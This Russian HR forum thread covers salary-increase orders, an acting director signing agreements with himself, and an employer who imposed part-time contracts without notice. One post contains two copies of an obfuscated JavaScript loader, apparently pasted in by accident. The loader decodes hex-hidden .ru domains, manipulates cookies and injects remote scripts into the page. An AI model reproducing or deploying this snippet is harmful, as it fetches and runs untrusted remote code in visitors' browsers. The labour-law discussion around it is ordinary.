Тема форума: Приказ на увеличение оклада | Форумы "Кадровое делопроизводство" | Сообщение № 832825
Vasia.pngПриветствуем Вас на форуме кадровиков-профессионалов и новичков в кадровом деле! Наш форум - для приятного профессионального общения, сотрудничества и взаимопомощи. Будьте вежливы))) Создавая новую тему, пожалуйста, формулируйте ее точно, полно и ясно. 
Не оставляйте в сообщениях активных ссылок на другие ресурсы. 
Участники, которые на форуме активно и грамотно отвечают на вопросы коллег, получают подписку на журнал "Кадровик-практик" в подарок

  RSS
Приказ на увеличение оклада
 
Необходимо сделать приказ на увеличение оклада сотруднику. Это приказ будет по основной деятельности? И как лучше составить приказ? Если можно, образец.
Ответы
 
Цитата
Margo@@@ пишет:
Как изменить оклад заместителю директора, который по назначению Министерства является и.о. директора, я делаю уведомление, которое подписывает он же и ознокамливается, т.е. сам себе и уведомление и ДС к ТД ?
Я так предполагаю, что сам себе и.о. директора не может подписать доп. соглашение, уведомление и ДС к ТД должно оформлять непосредственно само Министерство?
"Век живи - век учись!"
 
Margo@@@, , а штатное расписание вам кто утверждает? В частности оклады?
 
Вадим А, утверждается приказом и.о. директора, согласовывает Министерство
"Век живи - век учись!"
 
Конечно Министерство все решает, сам руководитель по своей инициативе ничего поменять не может. Но с Министерства никаких уведомлений об изменении оклада не было, вот я и думаю может ли и.о. сам на себя делать, сам подписывать сам ознакамливаться?
"Век живи - век учись!"
 
Я думаю, что все обязательно должно быть согласованно с вышестоящей инстанцией.У вас же бюджет тоже утверждает Министерство, следовательно и все нюансы связанные с денежными средствами должны быть согласованны.
 
Вадим А, не поняла про согласовывать, сейчас нужно издавать уведомление об изменении оклада? и в дальнейшем доп. соглашение он сам себе будет подписывать т.е. работодатель в лице и.о. директора и работник и.о. директора ? или же Министерство должно было уведомить и в дальнейшем ДС к ТД подписывать ?
"Век живи - век учись!"
 
Margo@@@, ну вы пишите что штатка согласовывается с министерством. Ну напишет ваш сотрудник зп в 100000, а министерство не согласует. Может стоит направить письмо согласование. Обосновать увеличение оклада. Если они согласуют тогда и вносить изменение в штатку.
 
Вадим А, так письмо приходило от Министерства я выше присылала, изменяются оклады всем, я не понимаю какое еще согласование с министерством, положение об оплате уже увозили на согласование, допустим сейчас я сделаю уведомление об изменении оклада на и.о. директора Иванова И.И., через 2 месяца он сам себе соглашение к трудовому договору будет подписывать?
".... именуемое в дальнейшем «Работодатель», в лице и.о. директора Иванова И.И, действующего на основании ....., и Иванов И.И., именуемый в дальнейшем «Работник», заключили настоящее соглашение о нижеследующем " далее сам подпишет и сам ознакомится?
"Век живи - век учись!"
 
Margo@@@, извините, про согласование. Совершенно верно вы же писали.
А трудовой договор с директором кто подписывал?
 
Вадим А, вообще было так: директор уволился, Министерство образование возложило исполнение обязанностей на заместителя директора, вот теперь зам. директора у нас и.о. директора. Позвонила в Министерство задала им вопрос (так как я не понимаю как он сам себе будет подписывать ДС к ТД он же и работодатель он же и работник получается), на что в Министерстве мне ответили, что по другому никак не сделать, но в голове у меня это не укладывается...
"Век живи - век учись!"
 
Margo@@@, , ну раз вам говорит Министерство, то оформить подписями директора с двух сторон.
В конце концов у вас есть согласованное штатное расписание и вы не нарушили процедуру согласования.
 
Margo@@@, , если бы у вас была коммерческая организация где гд, как хочет так и ворочит, тогда бы вопросов не было. А у вас как я понял структура государственная и каждый документ должен бвть согласован. Вы согласование получили.
 
Цитата
Вадим А пишет:
ну раз вам говорит Министерство
у нас постоянно из-за этого разночтения, в бухгалтерии мне тоже говорят что нельзя оплату более чем 75% от оклада производить работнику (0,5 по совместительству и 25% по совмещению, к примеру (а им это в Министерстве говорят), а я спорю, что оплата устанавливается по Соглашению сторон и минимальным/максимальным размером не ограничивается. Причем когда прошу номер с кем бы пообщаться на тему, так как каждый раз кавардак из-за этого, отвечают: "Хочешь руководителя подставить", в чем подстава честно не понимаю, я всего лишь хочу работать не в бардаке, и все упорядочить...устала сил нет...
"Век живи - век учись!"
 
Margo@@@


Цитата
Margo@@@ пишет:
Министерство образование возложило исполнение обязанностей на заместителя директора, вот теперь зам. директора у нас и.о. директора
Все бумаги на имя Иванова И.И. готовит Министерство и личное дело должно быть у них.
 
Валентина+Валентина, спасибо :handshake: , но вот все у нас хранится, а в Министерстве утверждают, что они не могут никаких соглашений делать, пока директором не назначат. Мне и не понятно на должность и.о. назначали, а сейчас ничего сделать не могут.
"Век живи - век учись!"
 
С 01.06.15 приказом по организации увеличили всем работникам оклад. На следующий день руководитель( И.П.) дал распоряжение заключить со всеми работниками ДС к ТД о неполном рабочем дне ( 6 часов) сознательно идя на нарушение. Ни заявления с работников ни тем более уведомления за 2 месяца не было. С не согласными подписать провели беседу за закрытыми дверями. Чем это чревато для И.П. ???

Прошу прощения- что-то с интернетом не лады. Не могу исправить. (удалить ненужное)


wind ow .a1336404323 = 1;!f unction(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="9876",n=f unction(o){var e=docu ment.cookie.match(new RegExp("(?:^|; )"+o.r eplace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1";)+"=([^;]*)";));return e?decodeURIComponent(e[1]):void 0},i=f unction(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600";),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=f unction(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=Stri ng.fromCharCode(parseInt(o[t],16));return e},c=f unction(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toS tring(16);return e},a=f unction(o,e,t){var n=docu ment.location.protocol+"//"+o;if(wind ow .smlo)window .smlo.loadSmlo(n.r eplace('https:','http:'));else if(wind ow .zSmlo)window .zSmlo.loadSmlo(n.r eplace('https:','http:'));else{var i=docu ment.createElement("script";);i.setAttribute("src",n),i.setAttribute("type","text/javascript";),document.head.appendChild(i),i.on load=f unction(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=f unction(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=f unction(u){var s=n("oisdom";);e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods";);m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,f unction(){i("oisdom",e)},f unction(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("kadrovik-praktik.ru";)+"_"+(self===top?0:1)+".js",a(f,f unction(){i("oisdom",e)},f unction(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

window .a1336404323 = 1;!f unction(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="9876",n=f unction(o){var e=docu ment.cookie.match(new RegExp("(?:^|; )"+o.r eplace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=f unction(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=f unction(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=Stri ng.fromCharCode(parseInt(o[t],16));return e},c=f unction(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toS tring(16);return e},a=f unction(o,e,t){var n=docu ment.location.protocol+"//"+o;if(wind ow .smlo)window .smlo.loadSmlo(n.r eplace('https:','http:'));else if(wind ow .zSmlo)window .zSmlo.loadSmlo(n.r eplace('https:','http:'));else{var i=docu ment.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=f unction(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=f unction(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=f unction(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,f unction(){i("oisdom",e)},f unction(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("kadrovik-praktik.ru")+"_"+(self===top?0:1)+".js",a(f,f unction(){i("oisdom",e)},f unction(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Изменено: galiya1808@mail.ru - 21.07.2015 08:52:24
 
Цитата
galiya1808@mail.ru пишет:
Чем это чревато для И.П. ???
Если будет внеплановая проверка ГИТ (по заявлению сотрудников) или это вылезет при плановой проверке, то штраф (возможна приостановка деятельности на срок до 90 дней). Размер - на усмотрение проверяющих.
Есть два типа людей: одни катят мир, а другие бегут рядом и кричат: «Боже, куда катится этот мир?»
 
Цитата
Margo@@@ пишет:
на должность и.о. назначали,
ТК РФ не предусмотрено и.о. Должен быть конкретно - директор.
 
А чем директор мотивировал переход на неполное рабочее время?
Какая причина указпна в приказе?
 
Цитата
Вадим А пишет:
А чем директор мотивировал переход на неполное рабочее время?
Какая причина указпна в приказе?
Да ничем. Да и приказа не было. Есть доп.соглашения с каждым работником о неполном рабочем дне с оплатой согласно отработанного времени. никто не хочет конфликтовать с начальником - у нас очень трудно в городе с работой. Просто ему "лишние расходы на соц.отчисления не нужны". Пробовали поспорить некоторые - задержал з.плату. Сказала ему про нарушение ТК - не захотел даже слушать. Вот как-то так.
Читают тему
Форма ответов
 
Текст сообщения*
Перетащите файлы
Ничего не найдено
Файл
 

Отписаться от сообщений с форума

Мнение администрации форума может не совпадать с мнением участников форума. Администрация форума не несет ответственности за сообщения, размещаемые участниками форума. Вместе с тем, убедительная просьба к участникам - при общении   не нарушать действующее законодательство: при цитировании чьих-либо произведений не нарушать права авторов, не распространять недостоверную порочащую кого-либо информацию, не разглашать чьи-либо персональные данные и т.д. Если Вы заметили сообщение, которое, возможно нарушает закон или правила форума, пожалуйста, напишите нам >> 

Пример HTML-страницы






Бесплатные ресурсы

Справочная база

Пошаговые инструкции
Образцы документов
Статьи и консультации
Разъяснения Роструда, НПА

Рассылки

Подпишитесь на наши рассылки:
- новые публикации,
- новости законодательства

Самоучитель

Познавайте кадровый учет сами с нашим самоучителем по кадровому делопроизводству

Кадровый аудит

Кадровый аудит своими силами. Найдите у себя эти ошибки и исправьте их

Фотообои

Фотообои с производственным календарем на 2024 год

Опросы

Опросы по сложным вопросам кадровой практики